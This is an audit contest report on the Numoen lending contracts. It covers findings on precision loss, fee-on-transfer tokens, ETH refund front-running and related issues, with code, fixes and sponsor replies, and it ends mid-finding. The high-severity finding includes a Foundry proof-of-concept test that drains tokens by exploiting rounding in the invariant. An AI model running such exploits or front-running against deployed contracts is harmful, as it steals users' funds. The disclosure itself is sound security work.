Numoen contest
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit contest is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit contest outlined in this document, C4 conducted an analysis of the Numoen smart contract system written in Solidity. The audit contest took place between January 26—February 1 2023.


32 Wardens contributed reports to the Numoen contest:

  1. 0xAgro
  2. 0xSmartContract
  3. 0xackermann
  4. 0xhacksmithh
  5. Allarious
  6. Aymen0909
  7. Breeje
  8. CodingNameKiki
  9. Deivitto
  10. Diana
  11. IllIllI
  12. NoamYakov
  13. Rageur
  14. RaymondFam
  15. ReyAdmirado
  16. Rolezn
  17. SleepingBugs (Deivitto and 0xLovesleep)
  18. adeolu
  19. antonttc
  20. arialblack14
  21. btk
  22. c3phas
  23. chrisdior4
  24. cryptostellar5
  25. hansfriese
  26. ladboy233
  27. matrix_0wl
  28. nadin
  29. oyc_109
  30. peakbolt
  31. rvierdiiev

This contest was judged by berndartmueller.

Final report assembled by liveactionllama.


The C4 analysis yielded an aggregated total of 7 unique vulnerabilities. Of these vulnerabilities, 1 received a risk rating in the category of HIGH severity and 6 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 9 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 18 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Numoen contest repository, and is composed of 15 smart contracts written in the Solidity programming language and includes 1,031 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (1)

[H-01] Precision loss in the invariant function can lead to loss of funds

Submitted by hansfriese


An attacker can steal the funds without affecting the invariant.

Proof of Concept

We can say the function Pair.invariant() is the heart of the protocol.
All the malicious trades should be prevented by this function.

52:   /// @inheritdoc IPair
53:   function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
54:     if (liquidity == 0) return (amount0 == 0 && amount1 == 0);
56:     uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;//@audit-info precison loss
57:     uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;//@audit-info precison loss
59:     if (scale1 > 2 * upperBound) revert InvariantError();
61:     uint256 a = scale0 * 1e18;
62:     uint256 b = scale1 * upperBound;
63:     uint256 c = (scale1 * scale1) / 4;
64:     uint256 d = upperBound * upperBound;
66:     return a + b >= c + d;
67:   }

The problem is there is a precision loss in the L56 and L57.
The precision loss can result in the wrong invariant check result.
Let’s say the token0 has 6 decimals and liquidity has more than 24 decimals.
Then the first FullMath.mulDiv will cause significant rounding before it’s converted to D18.
To clarify the difference I wrote a custom function invariant() to see the actual value of a+b-c-d.

  function invariant(uint256 amount0, uint256 amount1, uint256 liquidity, uint256 token0Scale, uint256 token1Scale) public view returns (uint256 res) {
    if (liquidity == 0) {
        require (amount0 == 0 && amount1 == 0);
        return 0;

    // uint256 scale0 = FullMath.mulDiv(amount0* token0Scale, 1e18, liquidity) ;
    // uint256 scale1 = FullMath.mulDiv(amount1* token1Scale, 1e18, liquidity) ;
    uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
    uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;

    if (scale1 > 2 * upperBound) revert();

    uint256 a = scale0 * 1e18;
    uint256 b = scale1 * upperBound;
    uint256 c = (scale1 * scale1) / 4;
    uint256 d = upperBound * upperBound;

    res = a + b - c - d;

  function testAudit1() external
    uint256 x = 1*10**6;
    uint256 y = 2 * (5 * 10**24 - 10**21);
    uint256 liquidity = 10**24;
    uint256 token0Scale=10**12;
    uint256 token1Scale=1;
    emit log_named_decimal_uint("invariant", invariant(x, y, liquidity, token0Scale, token1Scale), 36);

    x = 1.5*10**6;
    emit log_named_decimal_uint("invariant", invariant(x, y, liquidity, token0Scale, token1Scale), 36);

Put these two functions in the LiquidityManagerTest.t.sol and run the case.
The result is as below and it shows that while the reserve0 amount changes to 150%, the actual value a+b-c-d does not change.

F:\SOL\Code\Code4rena\2023-01-numoen>forge test -vv --match-test testAudit1
[⠒] Compiling...
No files changed, compilation skipped

Running 1 test for test/LiquidityManagerTest.t.sol:LiquidityManagerTest
[PASS] testAudit1() (gas: 10361)
  invariant: 0.000000000000000000000000000000000000
  invariant: 0.000000000000000000000000000000000000

Test result: ok. 1 passed; 0 failed; finished in 5.74ms

So what does this mean? We know that if a+b-c-d is positive, it means anyone can call swap() to withdraw the excess value.
The above test shows that the significant change in the token0 reserve amount did not change the value a+b-c-d.
Based on this, I wrote an attack case where dennis pulls 0.5*10**6 token0 without cost while the invariant stays at zero.
Although the benefit is only 0.5 USDC for this test case, this shows a possibility drawing value without affecting the invariant for pools with low decimals.

  function testAttack() external
    // token0 is USDC
    token0Scale = 6;
    token1Scale = 18;

    // cuh adds liquidity
    lendgine = Lendgine(factory.createLendgine(address(token0), address(token1), token0Scale, token1Scale, upperBound));

    uint256 amount0 = 1.5*10**6;
    uint256 amount1 = 2 * (5 * 10**24 - 10**21);
    uint256 liquidity = 10**24;, amount0);, amount1);

    token0.approve(address(liquidityManager), amount0);
    token1.approve(address(liquidityManager), amount1);

        token0: address(token0),
        token1: address(token1),
        token0Exp: token0Scale,
        token1Exp: token1Scale,
        upperBound: upperBound,
        liquidity: liquidity,
        amount0Min: amount0,
        amount1Min: amount1,
        sizeMin: 0,
        recipient: cuh,
        deadline: block.timestamp

    // dennis starts with zero token
    assertEq(token0.balanceOf(dennis), 0);

    // dennis pulls 0.5 USDC free
        SwapCallbackData({token0: address(token0), token1: address(token1), amount0: 0, amount1: 0, payer: dennis})


    // assert
    assertEq(token0.balanceOf(dennis), 5*10**5);

Tools Used


Make sure to multiply first before division to prevent precision loss.

  /// @inheritdoc IPair
  function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
    if (liquidity == 0) return (amount0 == 0 && amount1 == 0);

    uint256 scale0 = FullMath.mulDiv(amount0 * token0Scale, 1e18, liquidity) ;//@audit-info change here
    uint256 scale1 = FullMath.mulDiv(amount1 * token1Scale, 1e18, liquidity) ;//@audit-info change here

    if (scale1 > 2 * upperBound) revert InvariantError();

    uint256 a = scale0 * 1e18;
    uint256 b = scale1 * upperBound;
    uint256 c = (scale1 * scale1) / 4;
    uint256 d = upperBound * upperBound;

    return a + b >= c + d;

kyscott18 (Numoen) confirmed and commented:

We agree with the issue and implemented the same fix.

Medium Risk Findings (6)

[M-01] Fee on transfer tokens will not behave as expected

Submitted by RaymondFam, also found by Deivitto, 0xhacksmithh, peakbolt, and rvierdiiev

In Numoen, it does not specifically restrict the type of ERC20 collateral used for borrowing.

If fee on transfer token(s) is/are entailed, it will specifically make mint() revert in Lendgine.sol when checking if balanceAfter < balanceBefore + collateral.

Proof of Concept

File: Lendgine.sol#L71-L102

  function mint(
    address to,
    uint256 collateral,
    bytes calldata data
    returns (uint256 shares)

    uint256 liquidity = convertCollateralToLiquidity(collateral);
    shares = convertLiquidityToShare(liquidity);

    if (collateral == 0 || liquidity == 0 || shares == 0) revert InputError();
    if (liquidity > totalLiquidity) revert CompleteUtilizationError();
    // next check is for the case when liquidity is borrowed but then was completely accrued
    if (totalSupply > 0 && totalLiquidityBorrowed == 0) revert CompleteUtilizationError();

    totalLiquidityBorrowed += liquidity;
    (uint256 amount0, uint256 amount1) = burn(to, liquidity);
    _mint(to, shares);

    uint256 balanceBefore = Balance.balance(token1);
    IMintCallback(msg.sender).mintCallback(collateral, amount0, amount1, liquidity, data);
    uint256 balanceAfter = Balance.balance(token1);

99:    if (balanceAfter < balanceBefore + collateral) revert InsufficientInputError();

    emit Mint(msg.sender, collateral, shares, liquidity, to);

As can be seen from the code block above, line 99 is meant to be reverting when balanceAfter < balanceBefore + collateral. So in the case of deflationary tokens, the error is going to be thrown even though the token amount has been received due to the fee factor.


  1. whitelisting token0 and token1 ensuring no fee-on-transfer token is allowed when a new instance of a market is created using the factory, or
  2. calculating the balance before and after the transfer of token1 (collateral), and use the difference between those two balances as the amount received rather than using the input amount collateral if deflationary token is going to be allowed in the protocol.

kyscott18 (Numoen) commented:

Can you give an example of a deflationary token? Does this mean that the balance goes down w.r.t. time or w.r.t being transferred.

berndartmueller (judge) commented:

Can you give an example of a deflationary token? Does this mean that the balance goes down w.r.t. time or w.r.t being transferred.

@kyscott18 - With regard to being transferred. is a great resource on this topic.

berndartmueller (judge) commented:

This finding and its duplicates show a valid issue that prevents the use of rebase/FoT tokens with the protocol. As there is no clear mention of the support of non-standard ERC-20 tokens in the Numoen docs or contest README, I consider Medium the appropriate severity.

kyscott18 (Numoen) commented:

How is this different from If it isn’t any different, which I don’t think it is, then we will just acknowledge this and be mindful of which token we allow people to list.

berndartmueller (judge) commented:

@kyscott18 - In this specific case of the mint(..) function, there is no difference to Uniswap. Both implementations do not work properly for this kind of rebase/FoT tokens. Uniswap V3 is built on a setup of assumptions (see here), excluding rebase tokens.

It becomes a bigger issue if the use of rebase tokens can influence the token balance accounting of other regular ERC-20 token pairs, which is not the case for Numoen.

One of the other submissions presents further instances in the code which are potentially affected by incorrect token balance accounting caused by rebase/FoT token -> issue 272

kyscott18 (Numoen) commented:

Okay, thanks for clarifying. I think we should mark this as noted by the team because we want to use the same assumptions as uniswap in this case.

[M-02] First liquidity provider will suffer from revert or fund loss

Submitted by hansfriese


The first liquidity depositor should supply three input values amount0Min, amount1Min, liquidity via AddLiquidityParams but these three values should meet an accurate relationship, or else the depositor will suffer from revert or fund loss

Proof of Concept

The LPs are supposed to use the function LiquidityManager.addLiquidity(AddLiquidityParams calldata params) to add liquidity.
When the pool is not empty, this function calculates the amount0, amount1 according to the current total liquidity and the requested liquidity.
But when the pool is empty, these amounts are supposed to be provided by the caller.


120:   struct AddLiquidityParams {
121:     address token0;
122:     address token1;
123:     uint256 token0Exp;
124:     uint256 token1Exp;
125:     uint256 upperBound;
126:     uint256 liquidity;
127:     uint256 amount0Min;
128:     uint256 amount1Min;
129:     uint256 sizeMin;
130:     address recipient;
131:     uint256 deadline;
132:   }
134:   /// @notice Add liquidity to a liquidity position
135:   function addLiquidity(AddLiquidityParams calldata params) external payable checkDeadline(params.deadline) {
136:     address lendgine = LendgineAddress.computeAddress(
137:       factory, params.token0, params.token1, params.token0Exp, params.token1Exp, params.upperBound
138:     );
140:     uint256 r0 = ILendgine(lendgine).reserve0();
141:     uint256 r1 = ILendgine(lendgine).reserve1();
142:     uint256 totalLiquidity = ILendgine(lendgine).totalLiquidity();
144:     uint256 amount0;
145:     uint256 amount1;
147:     if (totalLiquidity == 0) {
148:       amount0 = params.amount0Min;//@audit-info caller specifies the actual reserve amount
149:       amount1 = params.amount1Min;//@audit-info
150:     } else {
151:       amount0 = FullMath.mulDivRoundingUp(params.liquidity, r0, totalLiquidity);
152:       amount1 = FullMath.mulDivRoundingUp(params.liquidity, r1, totalLiquidity);
153:     }
155:     if (amount0 < params.amount0Min || amount1 < params.amount1Min) revert AmountError();
157:     uint256 size = ILendgine(lendgine).deposit(
158:       address(this),
159:       params.liquidity,
160:       abi.encode(
161:         PairMintCallbackData({
162:           token0: params.token0,
163:           token1: params.token1,
164:           token0Exp: params.token0Exp,
165:           token1Exp: params.token1Exp,
166:           upperBound: params.upperBound,
167:           amount0: amount0,
168:           amount1: amount1,
169:           payer: msg.sender
170:         })
171:       )
172:     );
173:     if (size < params.sizeMin) revert AmountError();
175:     Position memory position = positions[params.recipient][lendgine]; // SLOAD
177:     (, uint256 rewardPerPositionPaid,) = ILendgine(lendgine).positions(address(this));
178:     position.tokensOwed += FullMath.mulDiv(position.size, rewardPerPositionPaid - position.rewardPerPositionPaid, 1e18);
179:     position.rewardPerPositionPaid = rewardPerPositionPaid;
180:     position.size += size;
182:     positions[params.recipient][lendgine] = position; // SSTORE
184:     emit AddLiquidity(msg.sender, lendgine, params.liquidity, size, amount0, amount1, params.recipient);
185:   }

Then how does the caller decide these amounts? These values should be chosen very carefully as we explain below.

The whole protocol is based on its invariant that is defined in Pair.invariant().
The invariant is actually ensuring that a+b-c-d stays not negative for all trades (interactions regarding reserve/liquidity).
Once a+b-c-d becomes strictly positive, anyone can call swap() function to pull the token0 of that amount without any cost.

52:   /// @inheritdoc IPair
53:   function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
54:     if (liquidity == 0) return (amount0 == 0 && amount1 == 0);
56:     uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
57:     uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;
59:     if (scale1 > 2 * upperBound) revert InvariantError();
61:     uint256 a = scale0 * 1e18;
62:     uint256 b = scale1 * upperBound;
63:     uint256 c = (scale1 * scale1) / 4;
64:     uint256 d = upperBound * upperBound;
66:     return a + b >= c + d;//@audit-info if strict inequality holds, anyone can pull token0 using swap()
67:   }

So going back to the question, if the LP choose the values amount0, amount1, liquidity not accurately, the transaction reverts or a+b-c-d becomes greater than zero.

Generally, liquidity providers do not specify the desired liquidity amount in other protocols.
During the conversation with the sponsor team, it is understood that they avoided the calculation of liquidity from amount0, amount1 because it is too complicated.
Off-chain calculation will be necessary to help the situation, and this would limit the growth of the protocol.
If any other protocol is going to integrate Numoen, they will face the same problem.

I did some calculations and got the formula for the liquidity as below.

$L = \frac{PCy+C^2x+\sqrt{2PC^3xy+C^4x^2}}{2P^2}$

where $C=10^{18}$, $x$ is amount0, $y$ is amount1, $P$ is the upperBound, $L$ is the liquidity amount that should be used.

Because the LP will almost always suffer revert or fund loss without help of off-chain calculation, I submit this as a medium finding.
I would like to note that there still exists a mitigation (not that crazy).
As a side note, it would be very helpful to add new preview functions.

Add a functionality to calculate the liquidity for the first deposit on-chain.
And it is also recommended to add preview functions.

kyscott18 (Numoen) acknowledged and commented:

We still think it is better off to pass in the amount of liquidity as part of the input. It won’t result in loss of funds for first time depositors because they can know before time if the amount of tokens they supply match up to the amount of liquidity that they specified or not. I will take a look at this formula in more detail.

[M-03] Economical games that can be played to gain MEV

Submitted by Allarious

Disclaimer from warden: Developers did an extremely good job writing the protocol, however, these are some aspects that I think are missed in the design stage and can be considered. Look at it as a food for thought in future designs.


How the invariant works

The invariant of the project is a power formula that follows:

k = x − (p_0 + (-1/2) * y)^2

Where it is implemented by the code below:

  function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
    if (liquidity == 0) return (amount0 == 0 && amount1 == 0);

    uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
    uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;

    if (scale1 > 2 * upperBound) revert InvariantError();

    uint256 a = scale0 * 1e18;
    uint256 b = scale1 * upperBound;
    uint256 c = (scale1 * scale1) / 4;
    uint256 d = upperBound * upperBound;

    return a + b >= c + d;

Where x is equal to scale0, y is equal to scale1 and p0 is the upper bound. The graph that draws the acceptable point by the invariant is shown below:

invariant image

We can see that the scale1 does not put a hard cap on scale0, but scale0 does. Also the upper half of the plot is not acceptable by the plot. Overall, it is expected by the protocol that the `(scale0, scale1) stays on the curve on the bottom.
The derivative of the equation is:

dx/dy = x/2 - p0
d(scale0)/d(scale1) = scale1 / 2 - p0

Which means whenever the price of the two tokens is different than this derivative, there is an arbitrage opportunity. The reason p0 is called upper bound is that the protocol only anticipates the price fraction until the price of asset1 is p0 times the price of asset0 (The curve needs scale1 to be less than zero to support lower prices which is not possible). when scale1 = 2*p0, the price of the scale1/scale0 is zero and scale0 is infinite times more valuable than scale1 token. This is the value used to make sure a position is never undercollateralized.

The problem

The liquidity market of a lendgine is revolved around upperbound. Liquidity providers are looking for the highest upperbound possible where the borrowers are providing the most collateral. And the borrowers are looking for the lowest upperbound possible where they lock in the least collateral for the most liquidity. Therefore, there should be a middle ground reached by the two sides. The middle ground for the both side is an uppderbound that is far away from the current price, where the liquidity providers feel safe, and is close enough to the actual price that the borrowers find the fees they pay logical. However, if the upperbound is a function of how close it is to the actual price, and the actual relative price of the two tokens is volatile, accepted upperbound will change through time as well. Therefore we can expect that for two tokens, the liquidity will be moving from one market to another as the accepted upperbound value changes. This means that if a lendgine is busy one day, might not be so busy the other day with the price change. This is not a problem by itself, but can leave some liquidity providers behind in locked markets which is explained in the proof of concept.

The second problem comes from the fact that while the lendgine algorithm makes sure a position is never undercollateralized, it does not value bigger markets more than the smaller ones. This means that a lender while lending, only cares about the smallest upperbound possible and the liquidity market would be basically a set of price bids, if a borrwer wants to borrow amount B from the whole market, starts from the smallest upperbound and if there is not enough liquidity in the smaller one, it makes its way up until he has B borrowed. (of course he will consider the fee that he should pay) Therefore, this would cause the liquidity providing market to be extremely scattered, and for each lendgine, liquidity providing is highly centralized (since many lendgines can be made and the upper bound value can be controversial).

Proof of concept

Lets consider several cases: (These also happen in other markets, but can get exaggerated here)

  • Imagine a liquidity market which has up to a considerable percentage of its liquidity borrowed, if the safe upperbound for the liquidators starts to move down the protocol allows the earliest liquidators to opt-out, creating a certain kind of MEV for the fastest liquidators. While the remaining providers will get more fees, the protocol favors the fastest actors to decide when to opt-out. In the extreme case of base token crashing down, there would be a race between borrowers to lock the money and the earliest liquidity providers to get out.
  • Liquidity providers might mint some shares for themselves in times of uncertainty, just to have the option to quickly opt-out of the protocol if they need. They can give back the borrowed amount and withdraw the said amount in one transaction. while if they do not lock the funds, they either have to take the funds out or someone else might come and get lock the funds.

There are two things that could be done in the future to mitigate issues:

  • value the bigger markets more than the smaller ones, where users are incentivized to use the bigger markets.
  • Use an aggregator that crawls over several markets and let liquidity providers to stake in a range of liquidity.

kyscott18 (Numoen) acknowledged and commented:

Really well written and appreciated.

[M-04] Wrong init code hash

Submitted by hansfriese, also found by nadin

An init code hash is used to calculate the address of UniswapV2 pair contract. But the init code hash is not same as the latest UniswapV2 repository.

Proof of Concept

UniswapV2Library.pairFor uses the following value as the init code hash of UniswapV2Pair.

    hex"e18a34eb0e04b04f7a0ac29a6e80748dca96319b42c54d679cb821dca90c6303" // init code hash

But it is different from the init code hash of the uniswap v2 repository.

I tested this using one of the top UniswapV2 pairs. DAI-USDC is in the third place here.

The token addresses are as follows:

DAI: 0x6B175474E89094C44Da98b954EedeAC495271d0F

USDC: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48

And the current UniswapV2Factory address is 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f here.

The pair address calculated is 0x6983E2Da04353C31c7C42B0EA900a40B1D5bf845. And we can’t find pair contract in the address.

So I think the old version of UniswapV2Factory and pair are used here. And it can cause a risk when liquidity is not enough for the pair.

Integrate the latest version of UniswapV2.

kyscott18 (Numoen) acknowledged and commented:

I should have been more specific, but the init code hash that I submitted is the sushiswap one.

[M-05] Borrower can lose partial fund during minting of Power Token as excess ETH are not refunded automatically

Submitted by peakbolt, also found by rvierdiiev and adeolu


When the collateral/speculative token (Token1) is WETH, a borrower could mint Power Tokens and deposit the collateral tokens by sending ETH while calling the payable mint() function in LendgineRouter.sol.

The exact collateral amount required to be deposited by the borrower is only calculated during minting (due to external swap), which could be lesser than what the borrower has sent for the mint. This means that there will be excess ETH left in LengineRouter contract and they are not automatically refunded to the borrower.

Anyone that sees this opportunity can call refundETH() to retrieve the excess ETH.

The borrower could retrieve the remaining ETH with a separate call to refundETH(). However, as the calls are not atomic, it is possible for a MEV bot to frontrun the borrower and steal the ETH too.

Furthermore, there are no documentation and test cases that advise or handle this issue.

Proof of Concept

First, call payable mint() in LendgineRouter contract with the required ETH amount for collateral.

function mint(MintParams calldata params) external payable checkDeadline(params.deadline) returns (uint256 shares) {


LendgineRouter.mintCallback() will be triggered, which will perform the external swap of the borrowed token0 to token1 on uniswap. The collateralSwap value (token1) is only calculated and known after the successful swap. Both swapped token1 and borrowed token1 are then sent to Lendgine contract (msg.sender).

// swap all token0 to token1
uint256 collateralSwap = swap(
    tokenIn: decoded.token0,
    tokenOut: decoded.token1,
    amount: SafeCast.toInt256(amount0),
    recipient: msg.sender

// send token1 back
SafeTransferLib.safeTransfer(decoded.token1, msg.sender, amount1);


After that, mintCallback() will continue to calculate the remaining token1 required to be paid by the borrower (collateralIn value).

Depending on the external swap, the collateralSwap (token1) value could be higher than expected, resulting in a lower collateralIn value. A small collateralIn value means that less ETH is required to be paid by the borrower (via the pay function), resulting in excess ETH left in the LengineRouter contract. However, the excess ETH is not automatically refunded by the mint() call.

Note: For WETH, the pay() uses the ETH balance deposited and wrap it before transferring to Lendgine contract.

// pull the rest of tokens from the user
uint256 collateralIn = collateralTotal - amount1 - collateralSwap;
if (collateralIn > decoded.collateralMax) revert AmountError();

pay(decoded.token1, decoded.payer, msg.sender, collateralIn);


A MEV bot or anyone that see this opportunity can call refundETH() to retrieve the excess ETH.

function refundETH() external payable {
	if (address(this).balance > 0) SafeTransferLib.safeTransferETH(msg.sender, address(this).balance);


Automatically refund any excess ETH to the borrower.

kyscott18 (Numoen) acknowledged and commented:

We expect this issue to be mitigated by a user using the multicall feature of our contract. When expecting to receive eth or not spending the total amount of eth sent, a multicall should be called with the second call calling refundEth() to sweep up the rest of the eth left over in the contract. Because the multicall is atomic, no bot can frontrun the user.

This situation is also present in Uniswap V3 and there has been some debate about it. For me, the general consensus is that it is not an issue as refundEth() and multicall() are expected to be used, and not using this is the fault of the user.

berndartmueller (judge) decreased severity to Medium and commented:

It is the responsibility of the user to use the contracts appropriately (e.g. using multicall(..)) to make sure leftover funds are sent out. However, due to the lack of documentation to properly educate about the usage of multicall, I consider Medium severity to be appropriate.

[M-06] Division before multiplication incurs unnecessary precision loss

Submitted by ladboy233, also found by Breeje


Proof of Concept

In the current codebase, FullMath.mulDiv is used, the function takes three parameters.

Basically FullMath.mulDIv(a, b, c) means a * b / c.

Then there are some operations which incur unnecessary precision loss because of division before multiplcation.

When accruing interest, the code below:

  /// @notice Helper function for accruing lendgine interest
  function _accrueInterest() private {
    if (totalSupply == 0 || totalLiquidityBorrowed == 0) {
      lastUpdate = block.timestamp;

    uint256 timeElapsed = block.timestamp - lastUpdate;
    if (timeElapsed == 0) return;

    uint256 _totalLiquidityBorrowed = totalLiquidityBorrowed; // SLOAD
    uint256 totalLiquiditySupplied = totalLiquidity + _totalLiquidityBorrowed; // SLOAD

    uint256 borrowRate = getBorrowRate(_totalLiquidityBorrowed, totalLiquiditySupplied);

    uint256 dilutionLPRequested = (FullMath.mulDiv(borrowRate, _totalLiquidityBorrowed, 1e18) * timeElapsed) / 365 days;
    uint256 dilutionLP = dilutionLPRequested > _totalLiquidityBorrowed ? _totalLiquidityBorrowed : dilutionLPRequested;
    uint256 dilutionSpeculative = convertLiquidityToCollateral(dilutionLP);

    totalLiquidityBorrowed = _totalLiquidityBorrowed - dilutionLP;
    rewardPerPositionStored += FullMath.mulDiv(dilutionSpeculative, 1e18, totalPositionSize);
    lastUpdate = block.timestamp;

    emit AccrueInterest(timeElapsed, dilutionSpeculative, dilutionLP);

Note the line:

 uint256 dilutionLPRequested = (FullMath.mulDiv(borrowRate, _totalLiquidityBorrowed, 1e18) * timeElapsed) / 365 days;

This basically equals to dilutionLPRequested = (borrowRate * totalLiquidityBorrowed / 1e18 * timeElapsed) / 365 days

The first part of division can greatly truncate the value borrowRate * totalLiquidityBorrowed / 1e18, the totalLiquidityBorrowed should be normalized and scaled by token precision when adding liqudity instead of division by 1e18 here.

Same preicision loss happens when computng the invariant

  /// @inheritdoc IPair
  function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
    if (liquidity == 0) return (amount0 == 0 && amount1 == 0);

    uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
    uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;

scale0 = (amount0 * 1e18 / liqudiity) * token0Scale
scale1 = (amount1 * 1e18 / liqudiity) * token1Scale

Whereas the amount0 and amount1 should be first be normalized by token0Scale and token1Scale and then divided by liquidity at last. If the liquidity is a larger number amount0 * 1e18 / liqudity is already truncated to 0.

We recommend the protocol avoid divison before multiplication and always perform division operation at last.

kyscott18 (Numoen) confirmed

Low Risk and Non-Critical Issues

For this contest, 9 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by CodingNameKiki received the top score from the judge.

The following wardens also submitted reports: matrix_0wl, SleepingBugs, IllIllI, 0xAgro, 0xSmartContract, btk, chrisdior4, and Rolezn.


Issues Template

Letter Name Description
L Low risk Potential risk
NC Non-critical Non risky findings
R Refactor Changing the code
O Ordinary Often found issues
Total Found Issues 21

Low Risk Issues

Count Explanation Instances
[L-01] Dangerous use of the burn function 1
[L-02] refundETH can be front-run preventing users from getting their eth back 1
[L-03] The function collect forgets to accrue position interest before the user collects the interest of his position 1
[L-04] Minting tokens to the zero address should be avoided 1
Total Low Risk Issues 4

Non-Critical Issues

Count Explanation Instances
[N-01] The function collect should revert incase the collateral is zero 1
[N-02] The check for liquidity in mint is unrealistic, as it can never happen 1
[N-03] Unnecessary if statement applied in the function sweepToken 2
[N-04] Require statements missing strings 3
[N-05] Constructor lacks address(0) check 4
[N-06] Confusing revert statement 1
Total Non-Critical Issues 6

Refactor Issues

Count Explanation Instances
[R-01] invariant could just return false if the liquidity is zero 1
[R-02] Some number values can be refactored with _ 1
[R-03] Value should be unchecked 1
[R-04] 2**<n> - 1 can be refactored as type(uint<n>).max 1
Total Refactor Issues 4

Ordinary Issues

Count Explanation Instances
[O-01] Floating pragma 12
[O-02] Use a more recent pragma version 15
[O-03] Events is missing indexed fields 1
[O-04] Function Naming suggestions 13
[O-05] Proper use of get as a function name prefix 3
[O-06] Hardcoded values can’t be changed 1
[O-07] PositionMath contains outdated compiler version 1
Total Ordinary Issues 7

[L-01] Dangerous use of the burn function

The function burn is used by users to burn an option position by minting the required liquidity and unlocking the collateral.
As how the function is designed right now in order to do that, the user needs to send his shares to the contract balance.
This is simply too risky, as anyone can call the function and basically burn the shares deposited by the users, before they even get the chance to call the function first.

Instead of the need to send the shares to the contract balance, the function can be refactored to check the balance of shares the user posses and to burn them in the moment of execution or on top of that to input a uint value of how many shares the user wants to burn.


105:  function burn(address to, bytes calldata data) external override nonReentrant returns (uint256 collateral) {
106:    _accrueInterest();
108:    uint256 shares = balanceOf[address(this)];
109:    uint256 liquidity = convertShareToLiquidity(shares);
110:    collateral = convertLiquidityToCollateral(liquidity);
112:    if (collateral == 0 || liquidity == 0 || shares == 0) revert InputError();
114:    totalLiquidityBorrowed -= liquidity;
115:    _burn(address(this), shares);
116:    SafeTransferLib.safeTransfer(token1, to, collateral); // optimistically transfer
117:    mint(liquidity, data);
119:    emit Burn(msg.sender, collateral, shares, liquidity, to);
120:  }

[L-02] refundETH can be front-run preventing users from getting their eth back

The function refundETH in Payment.sol is used by users to get their ether back if they send more than the needed amount when using the function pay. The problem here is as how the function is designed, any eth values in the contract can be withdrawn by anyone. This bring the risk, where a malicious users can front-run users and successfuly steal their refunds.


44:  function refundETH() external payable {
45:    if (address(this).balance > 0) SafeTransferLib.safeTransferETH(msg.sender, address(this).balance);
46:  }

[L-03] The function collect forgets to accrue position interest before the user collects the interest of his position

In Lendgine the function collect is used by the users to collect the interest that has been gathered to their liquidity position.
The problem here occurring is that the function is supposed to accrue both the global interest and the user’s liquidity position interest to the current block.timestamp. Note that what l just described is true and it’s already applied in a similar function in LiquidityManager - collect(). Consider calling accruePositionInterest prior to executing the function collect, so the interest can accrued till the current time of the block.timestamp.


194:  function collect(address to, uint256 collateralRequested) external override nonReentrant returns (uint256 collateral) {
195:    Position.Info storage position = positions[msg.sender]; // SLOAD
196:    uint256 tokensOwed = position.tokensOwed;
198:    collateral = collateralRequested > tokensOwed ? tokensOwed : collateralRequested;
200:    if (collateral > 0) {
201:      position.tokensOwed = tokensOwed - collateral; // SSTORE
202:      SafeTransferLib.safeTransfer(token1, to, collateral);
203:    }
205:    emit Collect(msg.sender, to, collateral);
206:  }

You can see that this is already applied in a similar function:


230:  function collect(CollectParams calldata params) external payable returns (uint256 amount) {
231:    ILendgine(params.lendgine).accruePositionInterest();
233:    address recipient = params.recipient == address(0) ? address(this) : params.recipient;
235:    Position memory position = positions[msg.sender][params.lendgine]; // SLOAD
237:    (, uint256 rewardPerPositionPaid,) = ILendgine(params.lendgine).positions(address(this));
238:    position.tokensOwed += FullMath.mulDiv(position.size, rewardPerPositionPaid - position.rewardPerPositionPaid, 1e18);
239:    position.rewardPerPositionPaid = rewardPerPositionPaid;
241:    amount = params.amountRequested > position.tokensOwed ? position.tokensOwed : params.amountRequested;
242:    position.tokensOwed -= amount;
244:    positions[msg.sender][params.lendgine] = position; // SSTORE
246:    uint256 collectAmount = ILendgine(params.lendgine).collect(recipient, amount);
247:    if (collectAmount != amount) revert CollectError(); // extra check for safety
249:    emit Collect(msg.sender, params.lendgine, amount, recipient);
250:  }

[L-04] Minting tokens to the zero address should be avoided

The core function mint is used by users to mint an option position by providing token1 as collateral and borrowing the max amount of liquidity. Address(0) check is missing in both this function and the internal function _mint, which is triggered to mint the tokens to the to address. Consider applying a check in the function to ensure tokens aren’t minted to the zero address.


71:  function mint(
72:    address to,
73:    uint256 collateral,
74:    bytes calldata data
75:  )
76:    external
77:    override
78:    nonReentrant
79:    returns (uint256 shares)
80:  {
81:    _accrueInterest();
83:    uint256 liquidity = convertCollateralToLiquidity(collateral);
